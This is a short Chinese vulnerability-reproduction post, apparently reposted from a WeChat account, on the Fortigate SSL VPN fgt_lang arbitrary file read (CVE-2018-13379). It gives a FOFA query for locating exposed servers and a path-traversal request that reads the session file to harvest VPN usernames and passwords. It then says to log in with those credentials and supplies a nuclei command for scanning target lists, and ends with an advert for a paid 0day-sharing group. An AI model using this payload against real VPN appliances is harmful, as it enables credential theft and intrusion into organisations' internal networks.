漏洞复现 Fortigate SSL VPN fgt_lang 任意文件读取
2023-6-27 15:2:36 Author: 阿乐你好(查看原文) 阅读量:195 收藏

0x01 漏洞描述

Fortinet将其SSL VPN产品线称为Fortigate SSL VPN,主要应用于最终用户以及中型企业。目前互联网上这些服务器的数量已超过48万台,主要集中在亚洲及欧洲区域。FortinetSSL VPN系统存在任意文件读取漏洞,攻击者通过漏洞可以通过VPN进入内网,导致内网失陷

0x02 漏洞复现

fofaapp="FORTINET-SSLVPN"

1.执行POC,得到VPN账号密码

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

2.根据账号密码登录即可(需要下载客户端)

3.nuclei验证脚本已经自带,如下

nuclei.exe -t /http/cves/2018/CVE-2018-13379.yaml -l subs.txt -stats

网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精,敬请期待!
👇👇👇

学历:非全日制的学历提升,高升专,专升本可学位

安全证书:cisp  cissp  cisp-pte 等

 有需要的私聊


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247489444&idx=1&sn=01e545d02668d056342faa3a437ba5f7&chksm=979a38eca0edb1fa8235858b26e2e52fd5ee99a2dd378e140157031857c993cf4ef73b100d94#rd
如有侵权请联系:admin#unsafe.sh